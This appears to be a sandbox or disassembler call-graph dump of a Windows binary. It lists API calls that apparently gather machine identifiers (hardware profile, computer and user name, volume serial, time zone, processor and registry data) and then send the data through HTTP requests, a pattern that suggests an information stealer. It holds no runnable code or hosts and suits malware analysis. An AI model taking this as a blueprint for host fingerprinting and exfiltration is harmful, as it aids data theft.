302ee0 24 API calls 15993->15995 15994->14948 15995->15924 15995->15925 15995->15926 15995->15927 15995->15928 15995->15929 15995->15932 15995->15936 15995->15940 15995->15943 15995->15944 15995->15949 15995->15964 15995->15970 15995->15972 15995->15976 15995->15983 15995->15989 15995->15991 15995->15992 15995->15993 15997 2ff867 15996->15997 15998 2ff87e 15997->15998 15999 2ff876 lstrcpy 15997->15999 15998->14974 15999->15998 16000->14993 16002 300446 16001->16002 16003 30044d GetVolumeInformationA 16001->16003 16002->16003 16004 300484 16003->16004 16005 3004b8 GetProcessHeap RtlAllocateHeap 16004->16005 16006 3004d2 16005->16006 16007 3004e4 wsprintfA lstrcat GetCurrentHwProfileA 16005->16007 16009 2ff810 lstrcpy 16006->16009 16008 30051f 16007->16008 16011 2ff810 lstrcpy 16008->16011 16010 3004dd 16009->16010 16010->15006 16012 300535 16011->16012 16013 30053d lstrlen 16012->16013 16014 300552 16013->16014 17286 301200 malloc strncpy 16014->17286 16016 30055c 16017 300566 lstrcat 16016->16017 16018 300576 16017->16018 16019 2ff810 lstrcpy 16018->16019 16020 300589 16019->16020 16020->15006 16022 2ff850 lstrcpy 16021->16022 16023 2f3e3a 16022->16023 17289 2f3d70 16023->17289 16025 2f3e46 16026 2ff810 lstrcpy 16025->16026 16027 2f3e67 16026->16027 16028 2ff810 lstrcpy 16027->16028 16029 2f3e74 16028->16029 16030 2ff810 lstrcpy 16029->16030 16031 2f3e81 16030->16031 16032 2ff810 lstrcpy 16031->16032 16033 2f3e8e 16032->16033 16034 2ff810 lstrcpy 16033->16034 16035 2f3e9b 16034->16035 16036 2f3eab InternetOpenA StrCmpCA 16035->16036 16037 2f3ed1 16036->16037 16038 2f3edc 16037->16038 16039 2f4370 InternetCloseHandle 16037->16039 16040 300b80 2 API calls 16038->16040 16053 2f4382 16039->16053 16041 2f3ee7 16040->16041 16042 2ff940 2 API calls 16041->16042 16043 2f3ef7 16042->16043 16044 2ff8f0 lstrcpy 16043->16044 16045 2f3f00 16044->16045 16046 2ff9a0 3 API calls 16045->16046 16047 2f3f21 16046->16047 16048 2ff8f0 lstrcpy 16047->16048 16049 2f3f2a 16048->16049 16050 2ff9a0 3 API calls 16049->16050 16051 2f3f43 16050->16051 16052 2ff8f0 lstrcpy 16051->16052 16054 2f3f4c 16052->16054 16053->15012 16055 2ff940 2 API calls 16054->16055 16056 2f3f64 16055->16056 16057 2ff8f0 lstrcpy 16056->16057 16058 2f3f6d 16057->16058 16059 2ff9a0 3 API calls 16058->16059 16060 2f3f86 16059->16060 16061 2ff8f0 lstrcpy 16060->16061 16062 2f3f8f 16061->16062 16063 2ff9a0 3 API calls 16062->16063 16064 2f3fa8 16063->16064 16065 2ff8f0 lstrcpy 16064->16065 16066 2f3fb1 16065->16066 16067 2ff9a0 3 API calls 16066->16067 16068 2f3fd4 16067->16068 16069 2ff940 2 API calls 16068->16069 16070 2f3fdb 16069->16070 16071 2ff8f0 lstrcpy 16070->16071 16072 2f3fe4 16071->16072 16073 2f3ff4 InternetConnectA 16072->16073 16073->16039 16074 2f4020 HttpOpenRequestA 16073->16074 16075 2f4058 16074->16075 16076 2f4363 InternetCloseHandle 16074->16076 16077 2f405c InternetSetOptionA 16075->16077 16078 2f4072 16075->16078 16076->16039 16077->16078 16079 2ff9a0 3 API calls 16078->16079 16080 2f4083 16079->16080 16081 2ff8f0 lstrcpy 16080->16081 16082 2f408c 16081->16082 16083 2ff940 2 API calls 16082->16083 16084 2f40a4 16083->16084 16085 2ff8f0 lstrcpy 16084->16085 16086 2f40ad 16085->16086 16087 2ff9a0 3 API calls 16086->16087 16088 2f40c6 16087->16088 16089 2ff8f0 lstrcpy 16088->16089 16090 2f40cf 16089->16090 16091 2ff9a0 3 API calls 16090->16091 16092 2f40e9 16091->16092 16093 2ff8f0 lstrcpy 16092->16093 16094 2f40f2 16093->16094 16095 2ff9a0 3 API calls 16094->16095 16096 2f410b 16095->16096 16097 2ff8f0 lstrcpy 16096->16097 16098 2f4114 16097->16098 16099 2ff9a0 3 API calls 16098->16099 16100 2f412d 16099->16100 16101 2ff8f0 lstrcpy 16100->16101 16102 2f4136 16101->16102 16103 2ff940 2 API calls 16102->16103 16104 2f414e 16103->16104 16105 2ff8f0 lstrcpy 16104->16105 16106 2f4157 16105->16106 16107 2ff9a0 3 API calls 16106->16107 16108 2f4170 16107->16108 16109 2ff8f0 lstrcpy 16108->16109 16110 2f4179 16109->16110 16111 2ff9a0 3 API calls 16110->16111 16112 2f4192 16111->16112 16113 2ff8f0 lstrcpy 16112->16113 16114 2f419b 16113->16114 16115 2ff940 2 API calls 16114->16115 16116 2f41b3 16115->16116 16117 2ff8f0 lstrcpy 16116->16117 16118 2f41bc 16117->16118 16119 2ff9a0 3 API calls 16118->16119 16120 2f41d5 16119->16120 16121 2ff8f0 lstrcpy 16120->16121 16122 2f41de 16121->16122 16123 2ff9a0 3 API calls 16122->16123 16124 2f41f9 16123->16124 16125 2ff8f0 lstrcpy 16124->16125 16126 2f4202 16125->16126 16127 2ff9a0 3 API calls 16126->16127 16128 2f421b 16127->16128 16129 2ff8f0 lstrcpy 16128->16129 16130 2f4224 16129->16130 16131 2ff9a0 3 API calls 16130->16131 16132 2f423d 16131->16132 16133 2ff8f0 lstrcpy 16132->16133 16134 2f4246 16133->16134 16135 2ff940 2 API calls 16134->16135 16136 2f425e 16135->16136 16137 2ff8f0 lstrcpy 16136->16137 16138 2f4267 16137->16138 16139 2ff810 lstrcpy 16138->16139 16140 2f427c 16139->16140 16141 2ff940 2 API calls 16140->16141 16142 2f4294 16141->16142 16143 2ff940 2 API calls 16142->16143 16144 2f429b 16143->16144 16145 2ff8f0 lstrcpy 16144->16145 16146 2f42a4 16145->16146 16147 2f42bc lstrlen 16146->16147 16148 2f42cc 16147->16148 16149 2f42d5 lstrlen 16148->16149 17297 2ffa50 16149->17297 16151 2f42e5 HttpSendRequestA InternetReadFile 16152 2f4354 InternetCloseHandle 16151->16152 16155 2f4308 16151->16155 17298 2ff890 16152->17298 16154 2ff9a0 3 API calls 16154->16155 16155->16152 16155->16154 16156 2ff8f0 lstrcpy 16155->16156 16157 2f4339 InternetReadFile 16155->16157 16156->16155 16157->16152 16157->16155 17302 2ffa50 16158->17302 16160 30240c StrCmpCA 16161 302417 ExitProcess 16160->16161 16162 30241e 16160->16162 16163 30242e strtok_s 16162->16163 16164 302587 16163->16164 16177 30243f 16163->16177 16164->15015 16165 30256b strtok_s 16165->16164 16165->16177 16166 302460 StrCmpCA 16166->16165 16166->16177 16167 3024f3 StrCmpCA 16167->16165 16167->16177 16168 302533 StrCmpCA 16168->16165 16169 3024b4 StrCmpCA 16169->16165 16169->16177 16170 302557 StrCmpCA 16170->16165 16171 302498 StrCmpCA 16171->16165 16171->16177 16172 302508 StrCmpCA 16172->16165 16172->16177 16173 30247c StrCmpCA 16173->16165 16173->16177 16174 30251d StrCmpCA 16174->16165 16175 3024de StrCmpCA 16175->16165 16175->16177 16176 2ff8a0 2 API calls 16176->16177 16177->16165 16177->16166 16177->16167 16177->16168 16177->16169 16177->16170 16177->16171 16177->16172 16177->16173 16177->16174 16177->16175 16177->16176 16179 2ff850 lstrcpy 16178->16179 16180 2f5bca 16179->16180 16181 2f3d70 5 API calls 16180->16181 16182 2f5bd6 16181->16182 16183 2ff810 lstrcpy 16182->16183 16184 2f5bf7 16183->16184 16185 2ff810 lstrcpy 16184->16185 16186 2f5c04 16185->16186 16187 2ff810 lstrcpy 16186->16187 16188 2f5c11 16187->16188 16189 2ff810 lstrcpy 16188->16189 16190 2f5c1e 16189->16190 16191 2ff810 lstrcpy 16190->16191 16192 2f5c2b 16191->16192 16193 2f5c3b InternetOpenA StrCmpCA 16192->16193 16194 2f5c61 16193->16194 16195 2f5c6c 16194->16195 16196 2f6246 InternetCloseHandle 16194->16196 16197 300b80 2 API calls 16195->16197 16198 2f625c 16196->16198 16199 2f5c77 16197->16199 17303 2f6cd0 CryptStringToBinaryA 16198->17303 16200 2ff940 2 API calls 16199->16200 16202 2f5c87 16200->16202 16204 2ff8f0 lstrcpy 16202->16204 16203 2f6262 16205 2ff8a0 2 API calls 16203->16205 16223 2f628c 16203->16223 16208 2f5c90 16204->16208 16206 2f6275 16205->16206 16207 2ff9a0 3 API calls 16206->16207 16209 2f6284 16207->16209 16211 2ff9a0 3 API calls 16208->16211 16210 2ff8f0 lstrcpy 16209->16210 16210->16223 16212 2f5cb1 16211->16212 16213 2ff8f0 lstrcpy 16212->16213 16214 2f5cba 16213->16214 16215 2ff9a0 3 API calls 16214->16215 16216 2f5cd3 16215->16216 16217 2ff8f0 lstrcpy 16216->16217 16218 2f5cdc 16217->16218 16219 2ff940 2 API calls 16218->16219 16220 2f5cf4 16219->16220 16221 2ff8f0 lstrcpy 16220->16221 16222 2f5cfd 16221->16222 16224 2ff9a0 3 API calls 16222->16224 16223->15026 16225 2f5d16 16224->16225 16226 2ff8f0 lstrcpy 16225->16226 16227 2f5d1f 16226->16227 16228 2ff9a0 3 API calls 16227->16228 16229 2f5d38 16228->16229 16230 2ff8f0 lstrcpy 16229->16230 16231 2f5d41 16230->16231 16232 2ff9a0 3 API calls 16231->16232 16233 2f5d64 16232->16233 16234 2ff940 2 API calls 16233->16234 16235 2f5d6b 16234->16235 16236 2ff8f0 lstrcpy 16235->16236 16237 2f5d74 16236->16237 16238 2f5d84 InternetConnectA 16237->16238 16239 2f6243 16238->16239 16240 2f5db0 HttpOpenRequestA 16238->16240 16239->16196 16241 2f6239 InternetCloseHandle 16240->16241 16242 2f5de9 16240->16242 16241->16239 16243 2f5ded InternetSetOptionA 16242->16243 16244 2f5e03 16242->16244 16243->16244 16245 2ff9a0 3 API calls 16244->16245 16246 2f5e14 16245->16246 16247 2ff8f0 lstrcpy 16246->16247 16248 2f5e1d 16247->16248 16249 2ff940 2 API calls 16248->16249 16250 2f5e35 16249->16250 16251 2ff8f0 lstrcpy 16250->16251 16252 2f5e3e 16251->16252 16253 2ff9a0 3 API calls 16252->16253 16254 2f5e57 16253->16254 16255 2ff8f0 lstrcpy 16254->16255 16256 2f5e60 16255->16256 16257 2ff9a0 3 API calls 16256->16257 16258 2f5e7b 16257->16258 16259 2ff8f0 lstrcpy 16258->16259 16260 2f5e84 16259->16260 16261 2ff9a0 3 API calls 16260->16261 16262 2f5e9f 16261->16262 16263 2ff8f0 lstrcpy 16262->16263 16264 2f5ea8 16263->16264 16265 2ff9a0 3 API calls 16264->16265 16266 2f5ec1 16265->16266 16267 2ff8f0 lstrcpy 16266->16267 16268 2f5eca 16267->16268 16269 2ff940 2 API calls 16268->16269 16270 2f5ee2 16269->16270 16271 2ff8f0 lstrcpy 16270->16271 16272 2f5eeb 16271->16272 16273 2ff9a0 3 API calls 16272->16273 16274 2f5f04 16273->16274 16275 2ff8f0 lstrcpy 16274->16275 16276 2f5f0d 16275->16276 16277 2ff9a0 3 API calls 16276->16277 16278 2f5f26 16277->16278 16279 2ff8f0 lstrcpy 16278->16279 16280 2f5f2f 16279->16280 16281 2ff940 2 API calls 16280->16281 16282 2f5f47 16281->16282 16283 2ff8f0 lstrcpy 16282->16283 16284 2f5f50 16283->16284 16285 2ff9a0 3 API calls 16284->16285 16286 2f5f69 16285->16286 16287 2ff8f0 lstrcpy 16286->16287 16288 2f5f72 16287->16288 16289 2ff9a0 3 API calls 16288->16289 16290 2f5f8d 16289->16290 16291 2ff8f0 lstrcpy 16290->16291 16292 2f5f96 16291->16292 16293 2ff9a0 3 API calls 16292->16293 16294 2f5faf 16293->16294 16295 2ff8f0 lstrcpy 16294->16295 16296 2f5fb8 16295->16296 16297 2ff9a0 3 API calls 16296->16297 16298 2f5fd1 16297->16298 16299 2ff8f0 lstrcpy 16298->16299 16300 2f5fda 16299->16300 16301 2ff9a0 3 API calls 16300->16301 16302 2f5ff4 16301->16302 16303 2ff8f0 lstrcpy 16302->16303 16304 2f5ffd 16303->16304 16305 2ff9a0 3 API calls 16304->16305 16306 2f6016 16305->16306 16307 2ff8f0 lstrcpy 16306->16307 16308 2f601f 16307->16308 16309 2ff9a0 3 API calls 16308->16309 16310 2f6038 16309->16310 16311 2ff8f0 lstrcpy 16310->16311 16312 2f6041 16311->16312 16313 2ff940 2 API calls 16312->16313 16314 2f6059 16313->16314 16315 2ff8f0 lstrcpy 16314->16315 16316 2f6062 16315->16316 16317 2ff9a0 3 API calls 16316->16317 16318 2f607b 16317->16318 16319 2ff8f0 lstrcpy 16318->16319 16320 2f6084 16319->16320 16321 2ff9a0 3 API calls 16320->16321 16322 2f609e 16321->16322 16323 2ff8f0 lstrcpy 16322->16323 16324 2f60a7 16323->16324 16325 2ff9a0 3 API calls 16324->16325 16326 2f60c0 16325->16326 16327 2ff8f0 lstrcpy 16326->16327 16328 2f60c9 16327->16328 16329 2ff9a0 3 API calls 16328->16329 16330 2f60e2 16329->16330 16331 2ff8f0 lstrcpy 16330->16331 16332 2f60eb 16331->16332 16333 2ff940 2 API calls 16332->16333 16334 2f6103 16333->16334 16335 2ff8f0 lstrcpy 16334->16335 16336 2f610c 16335->16336 16337 2f611c lstrlen 16336->16337 17308 2ffa50 16337->17308 16339 2f612d lstrlen GetProcessHeap RtlAllocateHeap 17309 2ffa50 16339->17309 16341 2f6150 lstrlen 17310 2ffa50 16341->17310 16343 2f6160 memcpy 17311 2ffa50 16343->17311 16345 2f6172 lstrlen 16346 2f6182 16345->16346 16347 2f618b lstrlen memcpy 16346->16347 17312 2ffa50 16347->17312 16349 2f61a7 lstrlen 17313 2ffa50 16349->17313 16351 2f61b7 HttpSendRequestA InternetReadFile 16352 2f622f InternetCloseHandle 16351->16352 16355 2f61da 16351->16355 16352->16241 16353 2ff9a0 3 API calls 16353->16355 16354 2ff8f0 lstrcpy 16354->16355 16355->16352 16355->16353 16355->16354 16356 2f6214 InternetReadFile 16355->16356 16356->16352 16356->16355 17314 2ffa50 16357->17314 16359 301e83 strtok_s 16360 301eed 16359->16360 16361 301e90 16359->16361 16360->15029 16362 301ed6 strtok_s 16361->16362 16363 2ff8a0 2 API calls 16361->16363 16364 2ff8a0 2 API calls 16361->16364 16362->16360 16362->16361 16363->16362 16364->16361 17315 2ffa50 16365->17315 16367 301c23 strtok_s 16368 301d4d 16367->16368 16374 301c34 16367->16374 16368->15042 16369 301d32 strtok_s 16369->16368 16369->16374 16370 301d04 StrCmpCA 16370->16374 16371 301c66 StrCmpCA 16371->16374 16372 301cd8 StrCmpCA 16372->16374 16373 301cac StrCmpCA 16373->16374 16374->16369 16374->16370 16374->16371 16374->16372 16374->16373 16375 2ff8a0 lstrlen lstrcpy 16374->16375 16375->16374 17316 2ffa50 16376->17316 16378 301da3 strtok_s 16382 301db4 16378->16382 16383 301e51 16378->16383 16379 301de8 StrCmpCA 16379->16382 16380 2ff8a0 2 API calls 16381 301e36 strtok_s 16380->16381 16381->16382 16381->16383 16382->16379 16382->16380 16382->16381 16384 2ff8a0 2 API calls 16382->16384 16383->15056 16384->16382 16386 2ff810 lstrcpy 16385->16386 16387 3044c3 16386->16387 16388 2ff9a0 3 API calls 16387->16388 16389 3044d4 16388->16389 16390 2ff8f0 lstrcpy 16389->16390 16391 3044dd 16390->16391 16392 2ff9a0 3 API calls 16391->16392 16393 3044f7 16392->16393 16394 2ff8f0 lstrcpy 16393->16394 16395 304500 16394->16395 16396 2ff9a0 3 API calls 16395->16396 16397 304519 16396->16397 16398 2ff8f0 lstrcpy 16397->16398 16399 304522 16398->16399 16400 2ff9a0 3 API calls 16399->16400 16401 30453b 16400->16401 16402 2ff8f0 lstrcpy 16401->16402 16403 304544 16402->16403 16404 2ff9a0 3 API calls 16403->16404 16405 30455d 16404->16405 16406 2ff8f0 lstrcpy 16405->16406 16407 304566 16406->16407 17317 2ffb60 GetProcessHeap RtlAllocateHeap GetLocalTime wsprintfA 16407->17317 16409 304573 16410 2ff9a0 3 API calls 16409->16410 16411 304580 16410->16411 16412 2ff8f0 lstrcpy 16411->16412 16413 304589 16412->16413 16414 2ff9a0 3 API calls 16413->16414 16415 3045a2 16414->16415 16416 2ff8f0 lstrcpy 16415->16416 16417 3045ab 16416->16417 16418 2ff9a0 3 API calls 16417->16418 16419 3045c4 16418->16419 16420 2ff8f0 lstrcpy 16419->16420 16421 3045cd 16420->16421 17318 300340 memset RegOpenKeyExA 16421->17318 16423 3045da 16424 2ff9a0 3 API calls 16423->16424 16425 3045e7 16424->16425 16426 2ff8f0 lstrcpy 16425->16426 16427 3045f0 16426->16427 16428 2ff9a0 3 API calls 16427->16428 16429 304609 16428->16429 16430 2ff8f0 lstrcpy 16429->16430 16431 304612 16430->16431 16432 2ff9a0 3 API calls 16431->16432 16433 30462b 16432->16433 16434 2ff8f0 lstrcpy 16433->16434 16435 304634 16434->16435 17321 3003e0 GetCurrentHwProfileA 16435->17321 16437 304645 16438 2ff940 2 API calls 16437->16438 16439 304655 16438->16439 16440 2ff8f0 lstrcpy 16439->16440 16441 30465e 16440->16441 16442 2ff9a0 3 API calls 16441->16442 16443 30467f 16442->16443 16444 2ff8f0 lstrcpy 16443->16444 16445 304688 16444->16445 16446 2ff9a0 3 API calls 16445->16446 16447 3046a1 16446->16447 16448 2ff8f0 lstrcpy 16447->16448 16449 3046aa 16448->16449 16450 300420 12 API calls 16449->16450 16451 3046bb 16450->16451 16452 2ff940 2 API calls 16451->16452 16453 3046cb 16452->16453 16454 2ff8f0 lstrcpy 16453->16454 16455 3046d4 16454->16455 16456 2ff9a0 3 API calls 16455->16456 16457 3046f5 16456->16457 16458 2ff8f0 lstrcpy 16457->16458 16459 3046fe 16458->16459 16460 2ff9a0 3 API calls 16459->16460 16461 304717 16460->16461 16462 2ff8f0 lstrcpy 16461->16462 16463 304720 16462->16463 16464 304728 GetCurrentProcessId 16463->16464 17328 301090 OpenProcess 16464->17328 16467 2ff940 2 API calls 16468 304748 16467->16468 16469 2ff8f0 lstrcpy 16468->16469 16470 304751 16469->16470 16471 2ff9a0 3 API calls 16470->16471 16472 304772 16471->16472 16473 2ff8f0 lstrcpy 16472->16473 16474 30477b 16473->16474 16475 2ff9a0 3 API calls 16474->16475 16476 304794 16475->16476 16477 2ff8f0 lstrcpy 16476->16477 16478 30479d 16477->16478 16479 2ff9a0 3 API calls 16478->16479 16480 3047b6 16479->16480 16481 2ff8f0 lstrcpy 16480->16481 16482 3047bf 16481->16482 16483 2ff9a0 3 API calls 16482->16483 16484 3047d8 16483->16484 16485 2ff8f0 lstrcpy 16484->16485 16486 3047e1 16485->16486 17333 3005a0 GetProcessHeap RtlAllocateHeap 16486->17333 16488 3047ee 16489 2ff9a0 3 API calls 16488->16489 16490 3047fb 16489->16490 16491 2ff8f0 lstrcpy 16490->16491 16492 304804 16491->16492 16493 2ff9a0 3 API calls 16492->16493 16494 30481d 16493->16494 16495 2ff8f0 lstrcpy 16494->16495 16496 304826 16495->16496 16497 2ff9a0 3 API calls 16496->16497 16498 30483f 16497->16498 16499 2ff8f0 lstrcpy 16498->16499 16500 304848 16499->16500 16501 2ff940 2 API calls 16500->16501 16502 304869 16501->16502 16503 2ff8f0 lstrcpy 16502->16503 16504 304872 16503->16504 16505 2ff9a0 3 API calls 16504->16505 16506 304893 16505->16506 16507 2ff8f0 lstrcpy 16506->16507 16508 30489c 16507->16508 16509 2ff9a0 3 API calls 16508->16509 16510 3048b5 16509->16510 16511 2ff8f0 lstrcpy 16510->16511 16512 3048be 16511->16512 17340 300900 CoInitializeEx CoInitializeSecurity CoCreateInstance 16512->17340 16514 3048cf 16515 2ff940 2 API calls 16514->16515 16516 3048df 16515->16516 16517 2ff8f0 lstrcpy 16516->16517 16518 3048e8 16517->16518 16519 2ff9a0 3 API calls 16518->16519 16520 304909 16519->16520 16521 2ff8f0 lstrcpy 16520->16521 16522 304912 16521->16522 16523 2ff9a0 3 API calls 16522->16523 16524 30492b 16523->16524 16525 2ff8f0 lstrcpy 16524->16525 16526 304934 16525->16526 17353 2ffb20 GetProcessHeap RtlAllocateHeap GetComputerNameA 16526->17353 16529 2ff9a0 3 API calls 16530 30494e 16529->16530 16531 2ff8f0 lstrcpy 16530->16531 16532 304957 16531->16532 16533 2ff9a0 3 API calls 16532->16533 16534 304970 16533->16534 16535 2ff8f0 lstrcpy 16534->16535 16536 304979 16535->16536 16537 2ff9a0 3 API calls 16536->16537 16538 304992 16537->16538 16539 2ff8f0 lstrcpy 16538->16539 16540 30499b 16539->16540 17355 2ffae0 GetProcessHeap RtlAllocateHeap GetUserNameA 16540->17355 16542 3049a8 16543 2ff9a0 3 API calls 16542->16543 16544 3049b5 16543->16544 16545 2ff8f0 lstrcpy 16544->16545 16546 3049be 16545->16546 16547 2ff9a0 3 API calls 16546->16547 16548 3049d7 16547->16548 16549 2ff8f0 lstrcpy 16548->16549 16550 3049e0 16549->16550 16551 2ff9a0 3 API calls 16550->16551 16552 3049f9 16551->16552 16553 2ff8f0 lstrcpy 16552->16553 16554 304a02 16553->16554 17356 3002c0 16554->17356 16557 2ff940 2 API calls 16558 304a23 16557->16558 16559 2ff8f0 lstrcpy 16558->16559 16560 304a2c 16559->16560 16561 2ff9a0 3 API calls 16560->16561 16562 304a4d 16561->16562 16563 2ff8f0 lstrcpy 16562->16563 16564 304a56 16563->16564 16565 2ff9a0 3 API calls 16564->16565 16566 304a6f 16565->16566 16567 2ff8f0 lstrcpy 16566->16567 16568 304a78 16567->16568 17361 2ffc30 16568->17361 16571 2ff940 2 API calls 16572 304a99 16571->16572 16573 2ff8f0 lstrcpy 16572->16573 16574 304aa2 16573->16574 16575 2ff9a0 3 API calls 16574->16575 16576 304ac3 16575->16576 16577 2ff8f0 lstrcpy 16576->16577 16578 304acc 16577->16578 16579 2ff9a0 3 API calls 16578->16579 16580 304ae5 16579->16580 16581 2ff8f0 lstrcpy 16580->16581 16582 304aee 16581->16582 17371 2ffb60 GetProcessHeap RtlAllocateHeap GetLocalTime wsprintfA 16582->17371 16584 304afb 16585 2ff9a0 3 API calls 16584->16585 16586 304b08 16585->16586 16587 2ff8f0 lstrcpy 16586->16587 16588 304b11 16587->16588 16589 2ff9a0 3 API calls 16588->16589 16590 304b2a 16589->16590 16591 2ff8f0 lstrcpy 16590->16591 16592 304b33 16591->16592 16593 2ff9a0 3 API calls 16592->16593 16594 304b4c 16593->16594 16595 2ff8f0 lstrcpy 16594->16595 16596 304b55 16595->16596 17372 2ffbc0 GetProcessHeap RtlAllocateHeap GetTimeZoneInformation 16596->17372 16599 2ff9a0 3 API calls 16600 304b6f 16599->16600 16601 2ff8f0 lstrcpy 16600->16601 16602 304b78 16601->16602 16603 2ff9a0 3 API calls 16602->16603 16604 304b91 16603->16604 16605 2ff8f0 lstrcpy 16604->16605 16606 304b9a 16605->16606 16607 2ff9a0 3 API calls 16606->16607 16608 304bb3 16607->16608 16609 2ff8f0 lstrcpy 16608->16609 16610 304bbc 16609->16610 16611 2ff9a0 3 API calls 16610->16611 16612 304bd5 16611->16612 16613 2ff8f0 lstrcpy 16612->16613 16614 304bde 16613->16614 17375 2ffd30 GetProcessHeap RtlAllocateHeap RegOpenKeyExA 16614->17375 16616 304beb 16617 2ff9a0 3 API calls 16616->16617 16618 304bf8 16617->16618 16619 2ff8f0 lstrcpy 16618->16619 16620 304c01 16619->16620 16621 2ff9a0 3 API calls 16620->16621 16622 304c1a 16621->16622 16623 2ff8f0 lstrcpy 16622->16623 16624 304c23 16623->16624 16625 2ff9a0 3 API calls 16624->16625 16626 304c3c 16625->16626 16627 2ff8f0 lstrcpy 16626->16627 16628 304c45 16627->16628 17378 2ffde0 GetLogicalProcessorInformationEx 16628->17378 16630 304c52 16631 2ff9a0 3 API calls 16630->16631 16632 304c5f 16631->16632 16633 2ff8f0 lstrcpy 16632->16633 16634 304c68 16633->16634 16635 2ff9a0 3 API calls 16634->16635 16636 304c81 16635->16636 16637 2ff8f0 lstrcpy 16636->16637 16638 304c8a 16637->16638 16639 2ff9a0 3 API calls 16638->16639 16640 304ca3 16639->16640 16641 2ff8f0 lstrcpy 16640->16641 16642 304cac 16641->16642 17391 2ffda0 GetSystemInfo wsprintfA 16642->17391 16644 304cb9 16645 2ff9a0 3 API calls 16644->16645 16646 304cc6 16645->16646 16647 2ff8f0 lstrcpy 16646->16647 16648 304ccf 16647->16648 16649 2ff9a0 3 API calls 16648->16649 16650 304ce8 16649->16650 16651 2ff8f0 lstrcpy 16650->16651 16652 304cf1 16651->16652 16653 2ff9a0 3 API calls 16652->16653 16654 304d0a 16653->16654 16655 2ff8f0 lstrcpy 16654->16655 16656 304d13 16655->16656 17392 2ffed0 GetProcessHeap RtlAllocateHeap 16656->17392 16658 304d20 16659 2ff9a0 3 API calls 16658->16659 16660 304d2d 16659->16660 16661 2ff8f0 lstrcpy 16660->16661 16662 304d36 16661->16662 16663 2ff9a0 3 API calls 16662->16663 16664 304d4f 16663->16664 16665 2ff8f0 lstrcpy 16664->16665 16666 304d58 16665->16666 16667 2ff9a0 3 API calls 16666->16667 16668 304d71 16667->16668 16669 2ff8f0 lstrcpy 16668->16669 16670 304d7a 16669->16670 17397 2fff40 16670->17397 16673 2ff940 2 API calls 16674 304d9b 16673->16674 16675 2ff8f0 lstrcpy 16674->16675 16676 304da4 16675->16676 16677 2ff9a0 3 API calls 16676->16677 16678 304dc5 16677->16678 16679 2ff8f0 lstrcpy 16678->16679 16680 304dce 16679->16680 16681 2ff9a0 3 API calls 16680->16681 16682 304de7 16681->16682 16683 2ff8f0 lstrcpy 16682->16683 16684 304df0 16683->16684 17402 300200 16684->17402 16686 304e01 16687 2ff940 2 API calls 16686->16687 16688 304e11 16687->16688 16689 2ff8f0 lstrcpy 16688->16689 16690 304e1a 16689->16690 16691 2ff9a0 3 API calls 16690->16691 16692 304e3b 16691->16692 16693 2ff8f0 lstrcpy 16692->16693 16694 304e44 16693->16694 16695 2ff9a0 3 API calls 16694->16695 16696 304e5d 16695->16696 16697 2ff8f0 lstrcpy 16696->16697 16698 304e66 16697->16698 17411 2fffc0 16698->17411 16700 304e7c 16701 2ff940 2 API calls 16700->16701 16702 304e8c 16701->16702 16703 2ff8f0 lstrcpy 16702->16703 16704 304e95 16703->16704 16705 2fffc0 17 API calls 16704->16705 16706 304eb3 16705->16706 16707 2ff940 2 API calls 16706->16707 16708 304ec3 16707->16708 16709 2ff8f0 lstrcpy 16708->16709 16710 304ecc 16709->16710 16711 2ff9a0 3 API calls 16710->16711 16712 304eed 16711->16712 16713 2ff8f0 lstrcpy 16712->16713 16714 304ef6 16713->16714 16715 304f06 lstrlen 16714->16715 16716 304f16 16715->16716 16717 2ff810 lstrcpy 16716->16717 16718 304f26 16717->16718 16719 2f1080 lstrcpy 16718->16719 16720 304f34 16719->16720 17431 3042a0 16720->17431 16722 304f3d 16722->15063 16724 2ff850 lstrcpy 16723->16724 16725 2f43fa 16724->16725 16726 2f3d70 5 API calls 16725->16726 16727 2f4406 GetProcessHeap RtlAllocateHeap 16726->16727 17660 2ffa50 16727->17660 16729 2f4441 InternetOpenA StrCmpCA 16730 2f4464 16729->16730 16731 2f446f InternetConnectA 16730->16731 16732 2f45aa InternetCloseHandle 16730->16732 16733 2f4495 HttpOpenRequestA 16731->16733 16734 2f45a3 InternetCloseHandle 16731->16734 16739 2f45b9 16732->16739 16735 2f44cc 16733->16735 16736 2f4596 InternetCloseHandle 16733->16736 16734->16732 16737 2f44e6 HttpSendRequestA HttpQueryInfoA 16735->16737 16738 2f44d0 InternetSetOptionA 16735->16738 16736->16734 16740 2f4518 16737->16740 16742 2f4536 16737->16742 16738->16737 16739->15073 16740->15073 16741 2f4555 InternetReadFile 16741->16736 16741->16742 16742->16736 16742->16740 16742->16741 17249 30b17e 17248->17249 17250 30b190 17249->17250 17267 309f80 17249->17267 17254 309fe0 17250->17254 17253 30b1a9 ctype 17253->15885 17255 30a123 17254->17255 17256 309ff2 17254->17256 17255->17253 17256->17255 17257 30a027 SetFilePointer 17256->17257 17258 30a058 17256->17258 17257->17253 17259 30a05d CreateFileA 17258->17259 17260 30a09e 17258->17260 17261 30a07d 17259->17261 17262 30a0d4 CreateFileMappingA 17260->17262 17263 30a0ab 17260->17263 17261->17253 17264 30a0e9 MapViewOfFile 17262->17264 17265 30a10c 17262->17265 17263->17253 17264->17263 17266 30a0ff CloseHandle 17264->17266 17265->17253 17266->17265 17268 309fd6 17267->17268 17269 309fb7 17267->17269 17268->17250 17269->17268 17270 309fbb lstrlen 17269->17270 17273 300a70 17270->17273 17275 2ff810 lstrcpy 17274->17275 17276 2f1f73 17275->17276 17276->15987 17278 2ff810 lstrcpy 17277->17278 17279 2f1ff3 17278->17279 17279->15948 17281 2ff810 lstrcpy 17280->17281 17282 2f1f13 17281->17282 17282->15950 17284 2ff810 lstrcpy 17283->17284 17285 2f1fd3 17284->17285 17285->15948 17287 2ff810 lstrcpy 17286->17287 17288 301230 17287->17288 17288->16016 17290 2f3d80 17289->17290 17290->17290 17291 2f3d87 ??_U@YAPAXI ??_U@YAPAXI ??_U@YAPAXI 17290->17291 17300 2ffa50 17291->17300 17293 2f3dd5 lstrlen 17301 2ffa50 17293->17301 17295 2f3de5 InternetCrackUrlA 17296 2f3e03 17295->17296 17296->16025 17297->16151 17299 2ff898 17298->17299 17299->16076 17300->17293 17301->17295 17302->16160 17304 2f6d3b 17303->17304 17305 2f6d01 LocalAlloc 17303->17305 17304->16203 17305->17304 17306 2f6d12 CryptStringToBinaryA 17305->17306 17306->17304 17307 2f6d29 LocalFree 17306->17307 17307->16203 17308->16339 17309->16341 17310->16343 17311->16345 17312->16349 17313->16351 17314->16359 17315->16367 17316->16378 17317->16409 17319 3003aa RegCloseKey CharToOemA 17318->17319 17320 30038c RegQueryValueExA 17318->17320 17319->16423 17320->17319 17322 3003f8 